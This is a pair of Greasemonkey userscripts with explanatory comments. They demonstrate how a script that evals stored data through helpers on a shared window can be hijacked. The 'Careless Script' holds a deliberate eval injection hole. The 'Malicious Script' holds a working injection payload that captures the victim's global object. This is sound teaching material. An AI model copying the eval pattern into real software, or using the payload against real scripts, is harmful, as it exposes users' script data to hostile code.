An example of how a malicious script can target a careless script if the window object is shared between all scripts.
// ==UserScript==
// @name Careless Script
// @namespace http://test.free.fr
// @description A non-malicious script that saves and retrieves data carelessly.
// @include *
// ==/UserScript==
// Serialises `array` with Array.prototype.toString ("1,2,3,...") and stores
// the text under `name` in the script manager's storage.
// Note that this helper lives on the shared `window`, so any other script
// running on the page can call it and write into this script's GM storage.
window.saveArray = function(name, array) {
  var serialized = array.toString();
  GM_setValue(name, serialized);
};
// Rebuilds an array from the text that saveArray stored under `name`.
// SECURITY: the stored text is spliced straight into source code and run with
// eval, so whoever controls that value (anything able to call saveArray via
// the shared window, as in the companion script below) controls what executes
// here, including access to this function's `this`. A safe replacement is
// JSON.parse('[' + GM_getValue(name) + ']') followed by an Array.isArray
// check, which rejects anything that is not a plain array literal.
window.getArray = function(name) {
// This is a direct, non-strict eval: the `var data` declared inside the
// evaluated string lands in this function's scope, which is why the
// `return data` below resolves even though `data` is never declared here.
eval('var data = [' + GM_getValue(name) + '];')
return data;
};
// Seed storage with a sample array through the shared helper above.
var data = [1, 2, 3, 4, 5, 6, 7, 8, 9];
saveArray('data', data);

// On every mousedown, read the stored array back and report its sum.
// getArray rebuilds the array by evaluating the stored text, so whatever is
// sitting in storage under 'data' at that moment is what gets executed.
document.addEventListener('mousedown', function() {
  var stored = getArray('data');
  var total = 0;
  var count = stored.length;
  var idx = 0;
  while (idx < count) {
    total += stored[idx];
    idx += 1;
  }
  alert("Sum of saved data: " + total);
}, false);
// ==UserScript==
// @name Malicious Script
// @namespace http://test.free.fr
// @description A malicious script that targets a careless script and gains access to its GM api functions.
// @include *
// ==/UserScript==
// Demonstration of why the careless script's design is unsafe. It only works
// because (a) saveArray/getArray are published on a window shared between
// scripts and (b) getArray evals whatever saveArray stored.
// @param {Function} [getArray] - the victim's getArray; when omitted (or when
//   called from the watch handler below with the freshly assigned value),
//   falls back to window.getArray.
// The defence belongs on the careless side: never eval stored data (parse it
// with JSON.parse and validate the shape) and do not expose GM-backed helpers
// on an object other scripts can reach.
function exploit(getArray) {
// Note the loose `==` here; `===` would be the idiomatic form.
if (typeof getArray == "undefined")
getArray = window.getArray;
// Writes a crafted value into the victim's storage under 'mal'. Because
// getArray wraps the stored text in "var data = [" ... "];", this value
// closes the array literal, stashes the victim's `this` on the shared window,
// and reopens an array literal so the evaluated text stays syntactically valid.
saveArray('mal', ']; window.stash = this; var n = [');
// Triggers the victim's eval on the crafted value; the only effect of interest
// is the window.stash side effect, the return value is discarded.
getArray('mal');
// Enumerate the captured object's property names purely to show what was
// obtained; `for...in` lists enumerable (including inherited) properties.
var str = "";
for (var i in window.stash)
str += i + "\n";
alert("A malicious script has obtained a reference\n" +
"to the global object of another script. It now has\n" +
"access to these global variables of that script:\n\n" + str);
}
// Entry point: if the careless script has already installed its helpers on the
// shared window, run the demonstration immediately; otherwise wait for it.
// Again the loose `!=` is used where `!==` would be idiomatic.
if (typeof saveArray != "undefined" &&
typeof getArray != "undefined") {
exploit();
} else {
// Pre-create both properties as null, presumably so they exist on this
// window object before the watch is attached — confirm whether the watch
// actually needs that.
window.saveArray = null;
window.getArray = null;
// Object.prototype.watch is a non-standard, Firefox-only API that has since
// been removed, so this branch only ever worked on older Firefox builds.
// Copying it onto `window` lets it be invoked on the shared window object.
window.watch = Object.prototype.watch;
// Fire once the careless script assigns window.getArray: the handler runs
// exploit with the newly assigned function and returns `newval` unchanged so
// the victim's assignment still takes effect and nothing looks amiss.
window.watch('getArray', function(id, oldval, newval) {
exploit(newval);
return newval;
});
}